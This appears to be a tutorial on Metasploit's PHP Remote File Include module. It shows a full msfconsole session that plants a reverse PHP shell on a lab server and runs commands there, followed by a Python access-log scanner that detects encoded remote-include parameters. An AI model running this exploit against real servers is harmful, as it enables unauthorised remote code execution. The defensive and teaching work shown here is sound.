Using the Metasploit PHP Remote File Include Module

Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from an RFI.

It's not too complicated to use: set your normal RHOST/RPORT options, set the PATH, and set PHPURI to the vulnerable path, putting XXpathXX where you would normally put your PHP shell. So we take something like the Simple Text-File Login Remote File Include, which has a vulnerable string of:

/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]
and make your PHPURI:
PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
Let's see it in action:
msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...

Exploits
========

Name                     Rank       Description
----                     ----       -----------
unix/webapp/php_include  excellent  PHP Remote File Include Generic Exploit

msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info

Name: PHP Remote File Include Generic Exploit
Version: 8762
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent

Provided by:
hdm
egypt

Available targets:
Id Name
-- ----
0 Automatic

Basic options:
Name        Current Setting                                              Required  Description
----        ---------------                                              --------  -----------
PATH        /                                                            yes       The base directory to prepend to the URL to try
PHPRFIDB    /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI                                                                   no        The URI to request, with the include parameter changed to XXpathXX
Proxies                                                                  no        Use a proxy chain
RHOST                                                                    yes       The target address
RPORT       80                                                           yes       The target port
SRVHOST     0.0.0.0                                                      yes       The local host to listen on.
SRVPORT     8080                                                         yes       The local port to listen on.
SSL         false                                                        no        Negotiate SSL for incoming connections
SSLVersion  SSL3                                                         no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                                                                  no        The URI to use for this exploit (default is random)
VHOST                                                                    no        HTTP server virtual host

Payload information:
Space: 32768

Description:
This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the
following:

msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST 192.168.6.68
RHOST => 192.168.6.68
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST 192.168.6.140
LHOST => 192.168.6.140
msf exploit(php_include) > exploit

[*] Started bind handler
[*] Using URL: http://192.168.6.140:8080/RvSIqhdft
[*] PHP include server started.
[*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30%38%30%2f%52%76%53%49%71%68%64%66%74%3f
[*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010

dir
0.jpeg header.inc.php license.txt slog_users.txt version.txt
1.jpeg index.asp old slogin.inc.php
adminlog.php install.txt readme.txt slogin_genpass.php
footer.inc.php launch.asp slog_users.php slogin_lib.inc.php

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
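
Seen from the target's access log, the request the module sent above is fully percent-encoded, so a plain search for "http://" in the log misses it. The following is an added example (not part of the original post or of Metasploit): a Python check that decodes each query parameter and flags values that resolve to a remote URL. The log lines, the 192.168.6.21 and 192.168.6.22 clients, search.php and host.example are constructed for illustration, and the check also covers nested encoding, which the post does not show.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# URL schemes PHP's include() can fetch from a remote host when allow_url_include is on.
REMOTE = re.compile(r"^\s*(?:https?|ftps?)://", re.I)
# Request target inside a combined-format access log line.
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')

def remote_include_params(target, rounds=3):
    """Return (name, decoded value) for each query value that decodes to a remote URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl has decoded once already; keep decoding to undo nested encoding.
        for _ in range(rounds):
            decoded = unquote(value)
            if decoded == value:
                break
            value = decoded
        if REMOTE.match(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Return (client, name, value) for every suspicious parameter in the log lines."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if m:
            client = line.split(" ", 1)[0]
            findings += [(client, n, v) for n, v in remote_include_params(m.group(1))]
    return findings

# Constructed sample log; the first request is the one shown in the module output above.
ENCODED = ("%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30"
           "%38%30%2f%52%76%53%49%71%68%64%66%74%3f")
SAMPLE_LOG = [
    f'192.168.6.140 - - [09/May/2010:21:37:25 -0400] "GET /1/slogin_lib.inc.php?slogin_path={ENCODED} HTTP/1.1" 200 512',
    '192.168.6.21 - - [09/May/2010:21:40:02 -0400] "GET /1/search.php?q=http+proxy+list HTTP/1.1" 200 2048',
    '192.168.6.22 - - [09/May/2010:21:41:10 -0400] "GET /1/slogin_lib.inc.php?slogin_path=%2568%2574%2574%2570%253a%252f%252fhost.example%252fa.txt HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for client, name, value in scan(SAMPLE_LOG):
        print(f"{client} {name}={value}")
```

On the server side, setting allow_url_include = Off in php.ini stops include() from fetching such URLs at all.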
